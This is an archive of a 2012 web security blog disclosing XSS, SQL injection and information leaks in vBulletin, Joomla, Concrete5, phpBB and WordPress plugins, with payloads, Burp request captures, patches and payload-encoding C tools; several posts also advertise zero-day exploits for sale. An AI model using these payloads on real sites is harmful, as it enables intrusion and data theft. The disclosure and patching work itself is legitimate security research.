Thursday 27 December 2012

[EN] 5 RCE in GetSimple 3.1.2 - Updated

Latest GetSimple CMS (3.1.2) is vulnerable to authentication bypass, and remote code exec.

RCE in latest GetSimple CMS



One of five exploits is here.
To all of you, who mailed me with feedback - thanks!

If you need the 4 other sploits (for testing) - just let me know ;)

o/

Monday 24 December 2012

[EN] OSSEC Cool Dashboard - New release!

This time the update is version number 0.5, which you can check here. :)

As always Jess was extremely fast with the new patch. Working with such a good coder is a pleasure.

Now, check OCD!

Friday 21 December 2012

[EN] All about filtering...

To know how I feel when I'm testing 'another' web-code, watch this. ;D

Merry Xmas ;)
o/

Thursday 20 December 2012

[EN] Joomla 3.0.2 leaked again

Joomla 3.0.2 is vulnerable to sql leak.

If a user supplies malformed data in the cookie (by appending a value to the md5 string), then
an SQL leak is possible and Joomla's table name prefix can be read.

Add 'malformed' value here - Burp

... and now you can see an error from <prefix>_session table:

SQL Leak - now you know what is the prefix

:)

If you watch this request/response you will see that those screens were created from the 'administrators' link. To stop comments like 'not useful because possible from admin' - try to reproduce this from a normal (registered) or pre-auth user. ;)

Another place where a user can input malformed data looks like this:

SQL Leak


cheers

[EN] Constant Contact for WordPress 2.3.12 XSSed

Constant Contact for WordPress 2.3.12 is vulnerable to XSS attack.

cc_username and cc_password parameters are vulnerable to persistent XSS.

[EN] Dooodl (1.1.4) XSSed

"History Viewer Look & Feel" in latest Dooodl is vulnerable to persistent XSS.

All forms available at wp-admin/admin.php?page=dooodl_gallery_layout&settings-updated=true
are vulnerable to XSS attack.

Add filtering for user input for parameters described as:
Body backgroundcolor, Dooodl item backgroundcolor, Link backgroundcolor, Link textcolor,
Title textcolor, General textcolor, Title backgroundcolor, Intro backgroundcolor, Intro textcolor

[EN] Constant Contact for WordPress 2.3.12 XSSed

In latest Constant Contact for WordPress (2.3.12) we have two vulnerable parameters.

cc_username and cc_password parameters are vulnerable to persistent XSS.

[EN] Admin Menu Editor XSSed

Latest version of "Admin Menu Editor" (1.1.13) plugin is vulnerable to persistent XSS attack.

Try to add some filtering in "Menu title" form ;)

[EN] Google Analyticator 6.4.1 XSSed

Google Analyticator 6.4.1 is vulnerable to cross-site scripting.


'Download extensions to track' is vulnerable to XSS.

The ga_adsense, ga_extra, ga_extra_after and ga_outbound_prefix parameters are also vulnerable to XSS.


[EN] Faster Image Insert 2.4.0 XSSed

Faster Image Insert (2.4.0) is vulnerable to XSS attack.

'Set custom string' form is vulnerable to XSS.
'Custom post types' is also vulnerable.

[EN] Events Manager 5.3.2.1 XSSed

Events Manager 5.3.2.1 is vulnerable to cross-site scripting.

'pno', '_wpnonce', 'cols', 'limit' parameters are vulnerable to XSS.

A 'bypass' to include XSS code in the limit parameter can be done by adding:
limit="></option></select><img src=x onerror=alert(1)><option>
(because you must close the <option> and <select> tags and then add the XSS).

[EN] Google Analytics for WordPress 4.2.8 XSSed

Google Analytics for WordPress (4.2.8) is vulnerable to cross-site scripting.

On the wp-admin/options-general.php?page=google-analytics-for-wordpress page
go to "Internal Links to Track as Outbound" and type your XSS code into the
'Internal links to track as outbound' form.

'Label to use' form is also vulnerable. Both are persistent.

Tuesday 18 December 2012

[EN] Installing WP-plugins without FTP server

A few times when I was testing some plugins for WordPress I was wondering how I could install a plugin without an FTP server. WordPress after a default installation needs a configured FTP server when you want to install a new plugin, but here is one quick hack I found on the net:

Edit your wp-config.php file and add there the line:
define('FS_METHOD', 'direct');

Now save your file, and enjoy installing plugins without an FTP server. :)
(With 'direct', WordPress writes the plugin files itself as the web-server user, so wp-content must be writable by that user; WordPress only falls back to asking for FTP credentials when it cannot write the files directly.)

Cheers
o/

[EN] WP-StatsDashboard XSSed

http://wordpress.org/extend/plugins/wp-stats-dashboard/

Very nice WordPress plugin. But it's vulnerable to XSS :)

When you're in 'Basic settings' type your 'Blog ID' name in HTML :]

This post will be updated, because in this plugin we will have more bugs.


Cheers o/



[EN] FIAGallery 2.16 Persistent XSS

Sure, it's another 'admin' XSS, anyway - a bug is a bug ;)

XSSed parameter 
Check it out at http://wordpress.org/extend/plugins/flash-album-gallery/.

Add htmlentities() when displaying this variable.

[EN] ReFlex Gallery 1.3 - Persistent XSS

ReFlex Gallery 1.3 - Multiple persistent XSS:
http://wordpress.org/extend/plugins/reflex-gallery/

'Enter Gallery Name' and 'Enter Gallery Description' are vulnerable to XSS.

Try to filter inputs from users in add-gallery.php:
<code>
43:    <p><input type="text" name="galleryCode" value="[ReflexGallery id='<?php echo $this->reflexdb->getNewGalleryId(); ?>']" size="40" /></p></div>
70:                <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
75:                <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
</code>

To patch it, just add htmlentities(). Like this:

<code>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$ grep htmlentities -n add-gallery.php
70:  <td><input type="text" size="30" name="galleryName" value="<?php echo htmlentities($galleryName); ?>" /></td>
75:  <td><input type="text" size="50" name="galleryDescription" value="<?php echo htmlentities($galleryDescription); ?>" /></td>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$
</code>


:)

[EN] WP Easy Gallery 2.6 XSS'ed - updated

Multiple XSS vulnerabilities found in latest WP Easy Gallery:

XSS is possible because the parameter "galleryName" is not filtered.
A user can add JS/HTML as the 'Gallery Name', so exploitation is possible.

As you can see below, 'galleryDescription' is also vulnerable.

If you want to check which other parameters are vulnerable here too, type at the console:

<code>
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$ grep -n echo add-gallery.php | grep php | grep -e "\\$"

(...)
75: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
80: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
85: <td><input id="upload_image" type="text" size="36" name="upload_image" value="<?php echo $imagepath; ?>" />
91: <td><input type="text" size="10" name="gallerythumbwidth" value="<?php echo $thumbwidth; ?>" /></td>
96: <td><input type="text" size="10" name="gallerythumbheight" value="<?php echo $thumbheight; ?>" /></td>

(...)
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$
</code>
------------------------------------

Update:
Also parameter "select_gallery" is vulnerable to this attack.

Update : 27.12.2012:

galleryName, galleryDescription, upload_image, gallerythumbwidth, gallerythumbheight
parameters are not filtered after user input.

Payload to reproduce this vulnerability:
']"/><body onload=alert(/boom/)>



[EN] Concrete5 CMS 6.0.2 - multiple vulnerabilities

Hi,

Concrete5 Team is creating a patch for my last few findings.

Once the patch is released, more detailed info will be published.

Cheers,
o/

[EN] ATutor 2.1 vulnerabilities

Hi,

a few findings in ATutor CMS.

I must say that the Developers Team is really fast :)

Good job, thanks!

(Post will be updated as soon as the dev team releases the patch.)

* Update 20.12.2012 *
Today the dev team sent me information about the patch.
Post will be updated as soon as possible.

o/

[EN] phpWebSite XSS

In cooperation with Matt, I would like to present to you a new patch for phpWebSite 1.7.3 :)

Matt, thanks for the fast reply and for writing the patch. It was a pleasure to work with you!

Details here, so update please ;)

Monday 17 December 2012

[EN] LinkedIn.com XSSed

Yes yes, LinkedIn is vulnerable to persistent XSS :)

I found a vulnerability for logged-in users. This time it is stored (persistent) XSS.
But it will be 'private' until LinkedIn Staff secure it.

Cheers
o/

Tuesday 27 November 2012

News for 27.11.2012

Hi there,

thanks for watching and all your emails! ;)

Finally I decided to publish here some news for you, so watch me carefully,
changes soon.

cheers
o/

Tuesday 11 September 2012

News for 09.2012

Hi ;]

As You can see, the blog has not been updated for the last few days.
It's all because of my new job! :)

So if You have any questions, ask me directly via e-mail please.
I will answer (as always) asap.

Cheers! o/

Thursday 30 August 2012

[EN] Persistent XSS in Concrete5.5.2.1 - 31.08 updated

* persistent xss

+ sql leak

... still testing so more - soon! ;]

* updated at 00:33 *

BIG thanks to Concrete5 Team for a fast reply, and fix! :)
Impressive!



* updated at 31.08 *

Check some changes here and here.
Also You can try the new version of Concrete5 here.

Wednesday 29 August 2012

[EN] TomatoCart 1.1.7 vulnerable to XSS


For example:
../tomatocart/ext/securimage/example_form.ajax.php:39:
           new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>',

($_SERVER['PHP_SELF'] is echoed unescaped into the script, and it includes any path info sent after the script name, so the request path is reflected straight into the page.)


Cheers o/

Monday 27 August 2012

[EN] Reflected XSS in latest e107 CMS (1.0.1)

Hi ;)

Someone asked me about this case by mail, so here is the answer:


1. Go to the 'register' page:

2. As Your e-mail confirmation, add yourm@il + the code from screen nr 3:

3. View from Burp Proxy:

4. ... and another one, parameters:

Cheers ;)

o/

Saturday 25 August 2012

[EN] phpBB 3.0.10 with 'stopped MySQL' funny one

Hi ;]

Check it out: when You ('for example') have some 'troubles'* with Your database,
then 'me as a pentester' can get some 'useful' information, if You have also installed phpBB. The idea is crazy but... it's just a talk, so ... ;)

Anyway, looks like this:
'Idea'-info...



... and we can do it like that:

Two (paranoid;)) scenarios:
- first: Your database (port) is ddosed / maybe crashed by some 'time limit' / too-many-connections-from-webapp situations, and so on...
- second: the database stopped in this or another way.

...and now: "plus" 'all above', if You have installed (default) phpBB 3.0.10,
You can get this information: "this maybe is default installed 'all'-server-soft"...

:) So, like I said, this 'could be' valuable information for tester, because now
he/she can 'hit' other "defaults", for example, with DirBuster, nmap, and so on.

How to repair that? Maybe a quick fix would be to remove the line that 'adds' information about
where the .sock-file is?

Let me know what do You think :)

Enjoy Your weekend!
o/

Saturday 4 August 2012

[EN] JavaScript Payload - GET Idea (1)

Hi,

maybe You'll get the idea of 'how XSS can be used at your page'
after reading this sample code :)

Enjoy and remember to test Your webapps! ;)

Code @ pastebin
o/


Wednesday 1 August 2012

[EN] This week TODO

Hi,

by the end of this week, I will publish here a few posts about what I'm doing right now. For now, it'll be:
- my new presentation about web security (will be here today/tomorrow),
- a few examples of XHR attacks,
- maybe some new bugs (if time permits... ;) ).

So - see You soon! ;)

Have a nice day
o/

Tuesday 31 July 2012

[EN] phpBB3 3.0.10 "Text-insertion bug"



Hi,

I found a weird bug in phpBB3 (3.0.10).

Once again, as so often when I'm doing webapp pentests,
the vulnerable parameter is 'connected' with date (functions).

Here You have some source code from text added (permanently) to the phpBB board:

Example 1:



Example 2:


If You need more details about it, let me know via comments or e-mail.

Cheers! :)

Sunday 29 July 2012

[EN] 2 codes for building payloads

Hi,

If You like playing with Burp or Paros, You will probably get the idea
of these:

/*
 * ascii2html.c - simple payload coder
 */

#include <stdio.h>

int main(void){
    int ch;   /* int, not char: getchar() returns EOF (-1), which a char cannot reliably hold */

    printf("what to say:\n");
    while((ch = getchar()) != EOF){   /* compare with EOF, not NULL */
        printf("&#%d", ch);           /* each byte as a decimal HTML entity, e.g. 'A' -> &#65 (no ';', browsers accept it) */
    }
    return 0;
}
and:

/*
 * ascii2url.c - simple payload coder(2)
 */

#include <stdio.h>

int main(void){
    int ch;   /* int, not char: getchar() returns EOF (-1) */

    printf("what to say:\n");
    while((ch = getchar()) != EOF){   /* compare with EOF, not NULL */
        printf("%%%02x", ch);         /* always two hex digits: '\n' must become %0a, not %a */
    }
    return 0;
}
The idea is simple, so maybe it will help ;) Enjoy o/
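As an added example (not the blog's code), here is the defender's counterpart to the two coders above, in C: a filter that only looks at the raw bytes never sees the '<' inside `&#60` or `%3c`, so detection has to decode both encodings first, repeating until nothing changes so that double-encoded input is caught as well. The fixed 1024-byte buffers and the short list of markup tokens are assumptions made for this demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* One decoding pass over "&#NNN;" (decimal; the ';' may be missing, exactly as
 * ascii2html.c emits it) and "%XX". Writes at most outsz-1 bytes plus a NUL and
 * returns the decoded length. Only byte values 0..255 are decoded; everything
 * else is copied through unchanged. */
size_t canonicalize(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    const char *p = in;

    while (*p != '\0' && o + 1 < outsz) {
        if (p[0] == '&' && p[1] == '#' && isdigit((unsigned char)p[2])) {
            char *end;
            long v = strtol(p + 2, &end, 10);
            if (v >= 0 && v < 256) {
                out[o++] = (char)v;
                p = (*end == ';') ? end + 1 : end;
                continue;
            }
        } else if (p[0] == '%' && isxdigit((unsigned char)p[1])
                   && isxdigit((unsigned char)p[2])) {
            char hex[3] = { p[1], p[2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            p += 3;
            continue;
        }
        out[o++] = *p++;
    }
    out[o] = '\0';
    return o;
}

/* Convenience for checks: does `in` decode (one pass) to exactly `want`? */
int decodes_to(const char *in, const char *want)
{
    char buf[1024];   /* assumption: inputs fit in 1 KiB */
    canonicalize(in, buf, sizeof buf);
    return strcmp(buf, want) == 0;
}

/* Returns 1 when a value meant for a plain-text field (a gallery name, an
 * event title, ...) carries markup once fully decoded. Decoding repeats until
 * a fixed point, so double-encoded input such as "%2526%2360;" is caught too. */
int looks_like_markup(const char *raw)
{
    static const char *needles[] = {   /* assumption: a small demo token list */
        "<script", "<img", "<body", "onerror=", "onload=", "javascript:"
    };
    char cur[1024], next[1024];
    size_t i;
    int round;

    strncpy(cur, raw, sizeof cur - 1);
    cur[sizeof cur - 1] = '\0';
    for (round = 0; round < 4; round++) {
        canonicalize(cur, next, sizeof next);
        if (strcmp(next, cur) == 0)
            break;                     /* nothing left to decode */
        strcpy(cur, next);
    }
    for (i = 0; cur[i] != '\0'; i++)   /* case-insensitive match */
        cur[i] = (char)tolower((unsigned char)cur[i]);
    for (i = 0; i < sizeof needles / sizeof needles[0]; i++)
        if (strstr(cur, needles[i]) != NULL)
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed samples: what ascii2html.c / ascii2url.c emit for "<script>",
     * a double-encoded variant, and a harmless gallery name. */
    const char *samples[] = {
        "&#60&#115&#99&#114&#105&#112&#116&#62",
        "%3c%73%63%72%69%70%74%3e",
        "%2526%2360;script%2362;",
        "Summer Gallery 2012",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-42s -> %s\n", samples[i],
               looks_like_markup(samples[i]) ? "BLOCK" : "ok");
    return 0;
}
```

Canonicalizing before matching is a detection aid, not a substitute for the htmlentities() output encoding shown in the ReFlex Gallery patch above.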

[EN] Hacking vBulletin 4.2.0 via Google... :)


Hi,

I saw that a few of You are watching me from some forums about, let's say,
'security'. ;)

That's how I found a simple trick to bypass 'authorized view only'
if You're using the (latest) vBulletin 4.2.0.

Ok, so. Example:
I found in the stats a few links like:
http://some-security;)-for.um/post-for-logged-in.bla

When I want to copy/paste this link into the address bar there will be an 'error':
"You are not logged in.", etc., etc...

But :)

...we can try one thing to check this 'logged-only' content/site :)

1. Copy/paste Your '4logged-only' link and search for it via google.com
2. Next, go to the 'copy' link.
3. Tadam! :D Content for logged-in users.

Enjoy ;)

o/

Thursday 26 July 2012

[EN] phpBB3 SQL Injection - updated (31.07)

Hello :)

After a little break and multiple tasks to do, a few minutes ago I found one surprise
in the latest phpBB3.

This is a 'so called' sql-information-leak via parameter manipulation (related to SQL).

I will not publish the full information today, because maybe some of You want to test Your installations first.

If so - let me know. Maybe I could help with a full webapp pentest.


* updated 10:11 *
- Found second vulnerable parameter :)

* updated 28.07 *
- another two parameters are vulnerable

* updated 31.08 *
Detailed story once again at PacketStorm.

Cheers ;) o/

Wednesday 27 June 2012

vBulletin 4.2 persistent XSS

Because my bug leaked somehow, here you have the full detailed info:

[ TITLE ....... ][ Persistent Cross-Site Scripting in vBulletin 4.2
[ DATE ........ ][ 15.06.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.2
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

This is a persistent cross-site scripting attack.
The vulnerability can be exploited by a normal ("registered") user.

[--------------------------------------------[
[ 3. Where is bug :)

To exploit this vulnerability we need (to create/register) a normal user account:

 3.1. Go to Your http://vBullet.in/forum/ and log in as a "normal user". (screen01)
 3.2. After logging in, we are redirected to /activity.php (this page is called 'Activity Stream').
 3.3. Now (as a registered user), we need to go to our /forum/calendar.php.
 3.4. We are now at "HOME-> Calendar ->Default Calendar". Now (on the right) we must click
      'Add new event'. (screen02)
 3.5. The vulnerable form field here is 'Title'. To check it, type as a title something like:
      test-title'><h1>Hi<br>Noam</h1><script>alert(123);</script> (screen03).
 3.6. And now: Your 'new event' is added 'as clear text' - by 'clear text' I mean
      'text only, without XSS'. But...
 3.7. Log out now, and log in again. Your added XSS code will be presented on the
      first page (activity.php) to the user who logs in.

If You want to re-test this bug, You should create 2 users: registered1 and registered2.
Add the payload ('add new event') as registered1, and log out. Now log in as registered2,
and after the login page, the XSS should be triggered.


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Pentests - mail me.
]
[ Best regards
[ 

Monday 4 June 2012

[EN] Persistent XSS for admin in WP 3.3.2 - wanna? ;)

Yes, yes, "for admin only".

...if 'admin' = a user who can create something. But 'what'? ;]
I will tell first all of You who send me a mail ;)

(And yes, I just want to check whether you 'are' interested (or 'not') in 'bugs' in admin panels too.
Who knows, maybe some of You are paranoid like me ;P and want to 'secure all' ;D)

If so, You know where You can find me ;)

Cheers o/

Sunday 3 June 2012

[EN] Joomla 2.5.4 - remote user logout bug

Yes, it seems that in the (still) latest Joomla (2.5.4) we have a so-called bug.

By sending a malformed request to the user, we are able to "log him out".

Why could this be used for an attack? Well, a badguy can change (deface) your company's site,
and add there a password-stealer (to the php code, for example).

Now he can log out all users like a sniper. ;]

(Yes yes, there is a way to do the same from the admin panel, but who cares...? ;))

I want to finish some tests right now, and in a few hours there will be an update here.

...and thanks for watching during all-this-break ;)

Cheers o/
;)

Thursday 24 May 2012

[EN] Hi from May ;)

This is a very busy week (or month) for me (good! :D), so
right now I just want to thank You for all the mails, comments
and talks. The blog will be updated very soon (100% sure before 1.06). So...

See You soon! ;)
 o/

Friday 11 May 2012

[EN] Jobs for Denmark and Brazil

A friend of mine is looking for new people to join his company as Support Team Members.
I don't know the details but if You want, let me know (via e-mail) and I will contact You directly.

Enjoy! ;)

o/


Monday 7 May 2012

[EN] Ohhh, baby...


8.05 - Updated!

In a few days I will add here another 'little article' about testing webapps.
This time we will try to check a ... aa whatever, You will see soon ... ;D

--
Thanks for watching and regards! o/



Monday 30 April 2012

[EN] Joomla 2.5.4 "SQL Info leak"

Ok,

so maybe You (still) have 'display_errors=On' (or sth...) on Your site...

So try this at Your localhost:

It's important to mention that if You (the 'attacker') get this error,
You (he) are able to view the 'randomed' Joomla prefixes for some names.
Look at the screen in the JOIN query.

Cheers! o/

[EN] vBulletin 4.1.12 - 'SQL Info leak' - up9.05

Sold. No more public.

Cheers o/

[EN] vBulletin 4.1.12 Cross-site scripting

[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.

(* ..., because I think this could be extended to attack
with 'non-visible button'. ;))

[--------------------------------------------[
[ 3. Where is bug :)

When You are logged in as a normal user, You can add a post to the forum.
You can give Your post a title (parameter "subject") of only 85 characters.
And that's the trick, because the error displayed to the user (if 'subject' is > 85 chars)
can contain XSS code.

Try to add Ax85+"><xss><

The screen from the attack You can see below:

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
[
[ Cheers o/

[EN] Buy 0days

I have a few new 0days for Your webapps ;)

Latest Joomla, WordPress, Drupal, TYPO3, vBulletin... it would be a good start to talk.

If You want anything - mail me.

o/

Saturday 28 April 2012

[EN] vBulletin 4.1.12 information disclosure - (01.05 UP)

Sure :)
...I don't have a 'free May'... :P

So here's one example:

Right now I can not tell more, but... See You soon! ;)

* Updated - 01.05 *  

Hi again,

To the point: if a user can add content (like a 'new page' – which is not in the default installation ;))
he can manipulate the parameters a little to get as an answer some 'information disclosure' bug.

And here's the example answer:


Check this line for more "information" ;)

Enjoy! o/

Friday 27 April 2012

[EN] Work to win 0day ;)


Yeah, yeah...;]

"Work"... like this:
currently I have a few "notes" about "possible" rce bugs in a few top10 webapps.

If You're interested to check it out, You know where You can find me... ;)

Regards
o/

[EN] Joomla 2.5.4 Information disclosure

Hi! :) Busy week and busy month... ;)

I have one more piece of information for You today:
in the latest Joomla I found an information disclosure bug.

Why is it 'information disclosure' (for now)? Because I'm still developing a working exploit for "this
parameter". I think it could be extended to other 'validation attacks'... so :D

For now, it's only 'information' (for You). ;)

I will update this information later (maybe next week), but now I have too much to do.

Anyway, if You need "no-public help", as always - mail me;)

Cheers! o/

EDIT: This is one bug I want to take a look at more, because it's available for not-logged-in users.
So "my favourite"! ;)

[EN] Wanna 0day for Your webapp? ;)

Ok. It's simple:
mail me with a request for a webapp (name and version) and I will tell You
what I have for it. Simple? ;)

Details we will discuss privately.

Cheers! ;)

Thursday 26 April 2012

[EN] Update for April! - finally (part 3)


As You can see below, I pasted a few news items. Check it out! ;)


Comments / questions are welcome!

Cheers o/

[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)


[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.

[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:

...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...

...[end of cut]...

So the vulnerable parameter is "approveImmediately", check it out:

...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)

...[end of response]...


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 Cross Site Scripting


[ TITLE ....... ][ Concrete 5.5.2.1 Cross Site Scripting
[ DATE ........ ][ 23.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross site scripting vulnerability.

[--------------------------------------------[
[ 3. Where is bug :)
...raw cut from Burp...
POST /concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form HTTP/1.1
(...)
...end cut...

And 'cut' from answer with our 'payload':
"
(...)
<script type="text/javascript" src="/www/concrete5.5.2.1/concrete/js/tiny_mce/tiny_mce.js?v=aa5e8ba94816af5cea082fa1b3a32500"></script>
<script type="text/javascript" src="/www/concrete5.5.2.1/index.php/tools/required/page_controls_menu_js?cID=121&amp;cvID=&amp;btask='';!--"<body onload=alert(12312312323)>=&{()}&amp;ts=1335145603"></script>
</body>
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 CMS - SQL Injection


[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection
[ DATE ........ ][ 22.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
SQL Injection.

[--------------------------------------------[
[ 3. Where is bug :)
The vulnerable parameter is fID. For example (from the MySQL logs):

    60832 Query    insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1
        WHERE Files.fID = '1 waitfor delay \'0:0:10\'--'
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio

Ok, so now we know that the SQL injection occurs in the parameter for 'statistics' (if file=downloaded >+1@stats).

Enjoy, but I saw that this parameter is available only for admin, so... ;> .

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete5.5.2.1 CMS information disclosure bug

[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug
[ DATE ........ ][ 22.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)
(...raw cut from Burp...)

GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
(...)
Referer: http://concrete-host/concrete5.5.2.1/index.php/search/
Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid
Connection: close

(...end cut...)

Hm :)

So the answer is (for a vulnerable php.ini of course):
"


<br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]:
The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and
'-,' in <b>/www/concrete5.5.2.1/concrete/startup/session.php</b> on line <b>32</b><br />
<!DOCTYPE html>
<html lang="en">
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[